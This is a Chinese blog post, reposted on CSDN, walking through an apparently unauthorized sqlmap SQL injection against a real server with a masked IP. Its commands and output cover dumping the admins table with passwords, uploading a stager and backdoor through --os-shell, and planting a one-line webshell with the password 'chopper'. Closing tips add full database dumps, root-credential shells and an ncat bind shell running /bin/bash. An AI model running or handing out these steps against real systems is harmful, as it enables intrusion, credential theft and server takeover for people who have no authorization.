mysql sqlmap注入_使用sqlmap进行MySQL注入并渗透某服务器

本文详述了如何利用sqlmap工具检测SQL注入点,然后逐步获取数据库信息、数据库表、数据,甚至通过时间盲注获取webshell,最终达到控制服务器的目的。涉及的技术包括时间盲注、数据库信息获取、表和数据提取、webshell获取等。
摘要由CSDN通过智能技术生成

本文作者:simeon

本文属于安全脉搏原创金币奖励计划文章,

sqlmap功能强大,在某些情况下,通过SQL注入可以直接获取webshell权限,甚至可以获取Windows或者Linux服务器权限。下面以一个实际案例来介绍如何获取服务器权限。

1、检测SQL注入点

SQL注入点可以通过扫描软件扫描,手工测试以及读取代码来判断,一旦发现存在SQL注入,可以直接进行检测,如图1所示,执行:

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263

可以获取信息:

web server operating system: Windows

web application technology: PHP 5.4.34, Apache 2.4.10

back-end DBMS: MySQL >= 5.0.12

通过提示信息可以知道该SQL注入点是基于时间的盲注。

81c256f9a8388846028e4da5b6598663.png 图1检测当前SQL注入点是否可用

2、获取当前数据库信息

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 --current-db

获取当前数据库为“Sshgdsys”,如图2所示。

3e4e30e0e047e3c638c7ef86f0d69756.png 图2获取当前数据库

3、获取当前数据库表

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys --tables

基于时间注入:

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '—time-sec')? [Y/n] y

24f66e984ac9ae272165be7de4fcd262.png 图3获取数据库中的表

4、获取admins表列和数据

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins --columns

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 -D sshgdsys -T admins -C id,adminpass ,adminname —dump

5、获取webshell

(1)获取网站信息

能够获取webshell的前提是能够确定网站的真实路径以及目录权限可以写入。通常使用—os-shell参数来获取。执行命令:

sqlmap.py -u http://***.**.**.**:8081/sshgdsys/fb/modify.php?id=263 --os-shell

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

选择web应用程序类型,选择4,开始获取网站的根目录,存在漏洞所在程序的路径,效果如图4所示。

[10:18:46] [INFO] retrieved the web server document root: 'E:xampphtdocs'

[10:18:46] [INFO] retrieved web server absolute paths: 'E:/xampp/htdocs/sshgdsys/fb/modify.php'

[10:18:46] [INFO] trying to upload the file stager on 'E:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[10:18:48] [INFO] heuristics detected web page charset 'utf-8'

[10:18:48] [INFO] the file stager has been successfully uploaded on 'E:/xampp/htdocs/' - http://***.**.**.**:8081/tmpuqioc.php

[10:18:48] [INFO] heuristics detected web page charset 'ascii'

[10:18:48] [INFO] the backdoor has been successfully uploaded on 'E:/xampp/htdocs/' - http://***.**.**.**:8081/tmpbboab.php

[10:18:48] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

0c32f845b887ecbbc87cd7a0c8c2868d.png 图4获取网站真实路径和当前目录

(2)获取webshell

在sqlmap命令提示窗口直接输入:

echo “” >1.php 在当前路径下生成1.php。

获取webshell: http://***.**.**.**:8081/1.php 一句话密码为:chopper

执行命令whomai即可获取系统权限,如图5所示。

2d1f587ec7947f25a1965c15448f43c5.png 图5获取系统权限

6、总结及技巧

(1)自动提交参数和智能进行注入:sqlmap.py -u url –batch –smart

(2)获取所有信息:sqlmap.py -u url –batch –smart -a

(3)导出数据库:sqlmap.py -u url -–dump-all

(4)直接连接数据库:python sqlmap.py -d “mysql://admin:admin@192.168.21.17:3306/testdb” -f –banner –dbs –users,例如root账号直接获取shell:

python sqlmap.py -d “mysql://root:123456@192.168.21.17:3306/mysql” –os-shell

(5)获取webshell: sqlmap.py -u url –os-shell

(6)linux下实现反弹:

ncat -l -p 2333 -e /bin/bash

ncat targetip 2333

注意:本文来自安全脉搏。本站无法对本文内容的真实性、完整性、及时性、原创性提供任何保证,请您自行验证核实并承担相关的风险与后果!

CoLaBug.com遵循[CC BY-SA 4.0]分享并保持客观立场,本站不承担此类作品侵权行为的直接责任及连带责任。您有版权、意见、投诉等问题,请通过[eMail]联系我们处理,如需商业授权请联系原作者/原网站。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值